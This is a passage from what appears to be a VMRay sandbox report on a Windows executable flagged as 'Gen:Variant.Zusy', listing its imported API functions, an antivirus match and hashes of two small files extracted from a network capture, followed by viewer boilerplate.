IntersectRect 0x0 0x422358 0x30fc0 0x30fc0 0x179
SystemParametersInfoA 0x0 0x42235c 0x30fc4 0x30fc4 0x271
GetWindowPlacement 0x0 0x422360 0x30fc8 0x30fc8 0x15b
GetWindowRect 0x0 0x422364 0x30fcc 0x30fcc 0x15c
MapDialogRect 0x0 0x422368 0x30fd0 0x30fd0 0x1b4
SetWindowPos 0x0 0x42236c 0x30fd4 0x30fd4 0x25b
GetWindow 0x0 0x422370 0x30fd8 0x30fd8 0x152
SetWindowContextHelpId 0x0 0x422374 0x30fdc 0x30fdc 0x257
EndDialog 0x0 0x422378 0x30fe0 0x30fe0 0xb9
SetActiveWindow 0x0 0x42237c 0x30fe4 0x30fe4 0x21c
IsWindow 0x0 0x422380 0x30fe8 0x30fe8 0x18f
CreateDialogIndirectParamA 0x0 0x422384 0x30fec 0x30fec 0x4c
GetDlgItem 0x0 0x422388 0x30ff0 0x30ff0 0x102
GetMenuCheckMarkDimensions 0x0 0x42238c 0x30ff4 0x30ff4 0x11e
LoadBitmapA 0x0 0x422390 0x30ff8 0x30ff8 0x198
GetMenuState 0x0 0x422394 0x30ffc 0x30ffc 0x127
ModifyMenuA 0x0 0x422398 0x31000 0x31000 0x1c4
SetMenuItemBitmaps 0x0 0x42239c 0x31004 0x31004 0x239
CheckMenuItem 0x0 0x4223a0 0x31008 0x31008 0x34
EnableMenuItem 0x0 0x4223a4 0x3100c 0x3100c 0xb5
GetFocus 0x0 0x4223a8 0x31010 0x31010 0x107
GetNextDlgTabItem 0x0 0x4223ac 0x31014 0x31014 0x133
GetMessageA 0x0 0x4223b0 0x31018 0x31018 0x12a
TranslateMessage 0x0 0x4223b4 0x3101c 0x3101c 0x282
DispatchMessageA 0x0 0x4223b8 0x31020 0x31020 0x95
GetActiveWindow 0x0 0x4223bc 0x31024 0x31024 0xdd
GetKeyState 0x0 0x4223c0 0x31028 0x31028 0x112
CallNextHookEx 0x0 0x4223c4 0x3102c 0x3102c 0x15
ValidateRect 0x0 0x4223c8 0x31030 0x31030 0x29a
IsWindowVisible 0x0 0x4223cc 0x31034 0x31034 0x192
PeekMessageA 0x0 0x4223d0 0x31038 0x31038 0x1dc
GetCursorPos 0x0 0x4223d4 0x3103c 0x3103c 0xfc
SetWindowsHookExA 0x0 0x4223d8 0x31040 0x31040 0x262
EnumChildWindows 0x0 0x4223dc 0x31044 0x31044 0xbd
GetSystemMetrics 0x0 0x4223e0 0x31048 0x31048 0x146
DrawIcon 0x0 0x4223e4 0x3104c 0x3104c 0xa9
UnregisterClassA 0x0 0x4223e8 0x31050 0x31050 0x28b
HideCaret 0x0 0x4223ec 0x31054 0x31054 0x166
ShowCaret 0x0 0x4223f0 0x31058 0x31058 0x265
ExcludeUpdateRgn 0x0 0x4223f4 0x3105c 0x3105c 0xd2
DrawFocusRect 0x0 0x4223f8 0x31060 0x31060 0xa6
GetParent 0x0 0x4223fc 0x31064 0x31064 0x135
GetLastActivePopup 0x0 0x422400 0x31068 0x31068 0x119
IsWindowEnabled 0x0 0x422404 0x3106c 0x3106c 0x190
GetWindowLongA 0x0 0x422408 0x31070 0x31070 0x156
MessageBoxA 0x0 0x42240c 0x31074 0x31074 0x1be
SetCursor 0x0 0x422410 0x31078 0x31078 0x226
PostQuitMessage 0x0 0x422414 0x3107c 0x3107c 0x1e0
PostMessageA 0x0 0x422418 0x31080 0x31080 0x1de
LoadIconA 0x0 0x42241c 0x31084 0x31084 0x19e
EnableWindow 0x0 0x422420 0x31088 0x31088 0xb7
GetClientRect 0x0 0x422424 0x3108c 0x3108c 0xf0
IsIconic 0x0 0x422428 0x31090 0x31090 0x18c
CharNextA 0x0 0x42242c 0x31094 0x31094 0x25
GetSysColorBrush 0x0 0x422430 0x31098 0x31098 0x144
GetMessageTime 0x0 0x422434 0x3109c 0x3109c 0x12d
GetSystemMenu 0x0 0x422438 0x310a0 0x310a0 0x145
SendMessageA 0x0 0x42243c 0x310a4 0x310a4 0x214
DefDlgProcA 0x0 0x422440 0x310a8 0x310a8 0x7e
IsWindowUnicode 0x0 0x422444 0x310ac 0x310ac 0x191
AppendMenuA 0x0 0x422448 0x310b0 0x310b0 0x7
GetDesktopWindow 0x0 0x42244c 0x310b4 0x310b4 0xff
LoadCursorA 0x0 0x422450 0x310b8 0x310b8 0x19a
DestroyMenu 0x0 0x422454 0x310bc 0x310bc 0x8d
GrayStringA 0x0 0x422458 0x310c0 0x310c0 0x164
DrawTextA 0x0 0x42245c 0x310c4 0x310c4 0xaf
TabbedTextOutA 0x0 0x422460 0x310c8 0x310c8 0x273
EndPaint 0x0 0x422464 0x310cc 0x310cc 0xbb
BeginPaint 0x0 0x422468 0x310d0 0x310d0 0xc
GetWindowDC 0x0 0x42246c 0x310d4 0x310d4 0x154
ReleaseDC 0x0 0x422470 0x310d8 0x310d8 0x203
GetDC 0x0 0x422474 0x310dc 0x310dc 0xfd
ClientToScreen 0x0 0x422478 0x310e0 0x310e0 0x3a
LoadStringA 0x0 0x42247c 0x310e4 0x310e4 0x1ab
ShowWindow 0x0 0x422480 0x310e8 0x310e8 0x26a
MoveWindow 0x0 0x422484 0x310ec 0x310ec 0x1c9
SetWindowTextA 0x0 0x422488 0x310f0 0x310f0 0x25e
IsDialogMessageA 0x0 0x42248c 0x310f4 0x310f4 0x188
GetSysColor 0x0 0x422490 0x310f8 0x310f8 0x143
DestroyWindow 0x0 0x422494 0x310fc 0x310fc 0x8e
PtInRect 0x0 0x422498 0x31100 0x31100 0x1ea
UpdateWindow 0x0 0x42249c 0x31104 0x31104 0x291
SendDlgItemMessageA 0x0 0x4224a0 0x31108 0x31108 0x20f
SetForegroundWindow 0x0 0x4224a4 0x3110c 0x3110c 0x230
MapWindowPoints 0x0 0x4224a8 0x31110 0x31110 0x1b9
GDI32.dll (39)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
SetMapMode 0x0 0x42201c 0x30c84 0x30c84 0x1e2
SetViewportOrgEx 0x0 0x422020 0x30c88 0x30c88 0x1f6
OffsetViewportOrgEx 0x0 0x422024 0x30c8c 0x30c8c 0x18c
SetViewportExtEx 0x0 0x422028 0x30c90 0x30c90 0x1f5
ScaleViewportExtEx 0x0 0x42202c 0x30c94 0x30c94 0x1c1
SetWindowExtEx 0x0 0x422030 0x30c98 0x30c98 0x1f9
ScaleWindowExtEx 0x0 0x422034 0x30c9c 0x30c9c 0x1c2
IntersectClipRect 0x0 0x422038 0x30ca0 0x30ca0 0x180
DeleteObject 0x0 0x42203c 0x30ca4 0x30ca4 0x53
GetDeviceCaps 0x0 0x422040 0x30ca8 0x30ca8 0x125
GetViewportExtEx 0x0 0x422044 0x30cac 0x30cac 0x178
GetWindowExtEx 0x0 0x422048 0x30cb0 0x30cb0 0x17b
CreateSolidBrush 0x0 0x42204c 0x30cb4 0x30cb4 0x4d
PtVisible 0x0 0x422050 0x30cb8 0x30cb8 0x1aa
RectVisible 0x0 0x422054 0x30cbc 0x30cbc 0x1ae
TextOutA 0x0 0x422058 0x30cc0 0x30cc0 0x205
ExtTextOutA 0x0 0x42205c 0x30cc4 0x30cc4 0x9e
Escape 0x0 0x422060 0x30cc8 0x30cc8 0x95
GetTextColor 0x0 0x422064 0x30ccc 0x30ccc 0x169
GetBkColor 0x0 0x422068 0x30cd0 0x30cd0 0x107
DPtoLP 0x0 0x42206c 0x30cd4 0x30cd4 0x4e
LPtoDP 0x0 0x422070 0x30cd8 0x30cd8 0x182
GetMapMode 0x0 0x422074 0x30cdc 0x30cdc 0x147
PatBlt 0x0 0x422078 0x30ce0 0x30ce0 0x194
SetBkMode 0x0 0x42207c 0x30ce4 0x30ce4 0x1ce
GetStockObject 0x0 0x422080 0x30ce8 0x30ce8 0x15f
SelectObject 0x0 0x422084 0x30cec 0x30cec 0x1c7
RestoreDC 0x0 0x422088 0x30cf0 0x30cf0 0x1b9
SaveDC 0x0 0x42208c 0x30cf4 0x30cf4 0x1c0
DeleteDC 0x0 0x422090 0x30cf8 0x30cf8 0x50
GetObjectA 0x0 0x422094 0x30cfc 0x30cfc 0x14f
SetBkColor 0x0 0x422098 0x30d00 0x30d00 0x1cd
SetTextColor 0x0 0x42209c 0x30d04 0x30d04 0x1f3
GetClipBox 0x0 0x4220a0 0x30d08 0x30d08 0x11a
CreateDIBitmap 0x0 0x4220a4 0x30d0c 0x30d0c 0x30
GetTextExtentPointA 0x0 0x4220a8 0x30d10 0x30d10 0x170
BitBlt 0x0 0x4220ac 0x30d14 0x30d14 0x11
CreateCompatibleDC 0x0 0x4220b0 0x30d18 0x30d18 0x2a
CreateBitmap 0x0 0x4220b4 0x30d1c 0x30d1c 0x24
comdlg32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
GetFileTitleA 0x0 0x4224c0 0x31128 0x31128 0x7
WINSPOOL.DRV (3)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
ClosePrinter 0x0 0x4224b0 0x31118 0x31118 0x1c
DocumentPropertiesA 0x0 0x4224b4 0x3111c 0x3111c 0x47
OpenPrinterA 0x0 0x4224b8 0x31120 0x31120 0x7c
ADVAPI32.dll (4)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
RegCloseKey 0x0 0x422000 0x30c68 0x30c68 0x15b
RegOpenKeyExA 0x0 0x422004 0x30c6c 0x30c6c 0x172
RegSetValueExA 0x0 0x422008 0x30c70 0x30c70 0x186
RegCreateKeyExA 0x0 0x42200c 0x30c74 0x30c74 0x15f
COMCTL32.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0x11 0x422014 0x30c7c 0x30c7c -
oledlg.dll (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0x8 0x422508 0x31170 0x31170 -
ole32.dll (15)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
CoFreeUnusedLibraries 0x0 0x4224c8 0x31130 0x31130 0x16
OleInitialize 0x0 0x4224cc 0x31134 0x31134 0xc9
CoTaskMemAlloc 0x0 0x4224d0 0x31138 0x31138 0x4e
CoTaskMemFree 0x0 0x4224d4 0x3113c 0x3113c 0x4f
CreateILockBytesOnHGlobal 0x0 0x4224d8 0x31140 0x31140 0x60
StgCreateDocfileOnILockBytes 0x0 0x4224dc 0x31144 0x31144 0xfe
StgOpenStorageOnILockBytes 0x0 0x4224e0 0x31148 0x31148 0x10a
CoGetClassObject 0x0 0x4224e4 0x3114c 0x3114c 0x1c
CLSIDFromString 0x0 0x4224e8 0x31150 0x31150 0x6
CLSIDFromProgID 0x0 0x4224ec 0x31154 0x31154 0x5
CoRegisterMessageFilter 0x0 0x4224f0 0x31158 0x31158 0x40
CoRevokeClassObject 0x0 0x4224f4 0x3115c 0x3115c 0x47
OleFlushClipboard 0x0 0x4224f8 0x31160 0x31160 0xc4
OleIsCurrentClipboard 0x0 0x4224fc 0x31164 0x31164 0xcb
OleUninitialize 0x0 0x422500 0x31168 0x31168 0xe0
OLEPRO32.DLL (1)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
(by ordinal) 0xfd 0x4222ac 0x30f14 0x30f14 -
OLEAUT32.dll (9)
»
API Name Ordinal IAT Address Thunk RVA Thunk Offset Hint
VariantTimeToSystemTime 0xb9 0x422284 0x30eec 0x30eec -
SysAllocStringLen 0x4 0x422288 0x30ef0 0x30ef0 -
SysFreeString 0x6 0x42228c 0x30ef4 0x30ef4 -
VariantCopy 0xa 0x422290 0x30ef8 0x30ef8 -
VariantChangeType 0xc 0x422294 0x30efc 0x30efc -
SysAllocString 0x2 0x422298 0x30f00 0x30f00 -
SysAllocStringByteLen 0x96 0x42229c 0x30f04 0x30f04 -
SysStringLen 0x7 0x4222a0 0x30f08 0x30f08 -
VariantClear 0x9 0x4222a4 0x30f0c 0x30f0c -
Local AV Matches (1)
»
Threat Name Severity
Gen:Variant.Zusy.308149
Malicious
0c26b620ab8e6837cbb9527f79a4cd029243b0da2f72c420f257fc4a2c6f4b44 Downloaded File Text
Unknown
»
Parent File analysis.pcap
Mime Type text/html
File Size 1.04 KB
MD5 335fafc74a1d3a0caebc3e1896c46351 Copy to Clipboard
SHA1 2081f4a1c334b5b498155f5629923f89c16325a6 Copy to Clipboard
SHA256 0c26b620ab8e6837cbb9527f79a4cd029243b0da2f72c420f257fc4a2c6f4b44 Copy to Clipboard
SSDeep 24:2dmMPmIAvy45SUtXYuwxvqmrxrqTt+YVbOr:cVmIAqySCYuQlowQm Copy to Clipboard
ImpHash -
7017296fe4621fb5765b17dfc94485c7663d18f3cc35159f368899a55cce4ee5 Downloaded File Text
Unknown
»
Parent File analysis.pcap
Mime Type text/plain
File Size 67 Bytes
MD5 7955497d0248dbb62f643c3a5a62def5 Copy to Clipboard
SHA1 1ea45f4793f6ac81f252a74dfd6a2423bd66b612 Copy to Clipboard
SHA256 7017296fe4621fb5765b17dfc94485c7663d18f3cc35159f368899a55cce4ee5 Copy to Clipboard
SSDeep 3:A7G0FDTa26XJT4W8YMlgh0Dec:A7G0NDaeYMlVp Copy to Clipboard
ImpHash -
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image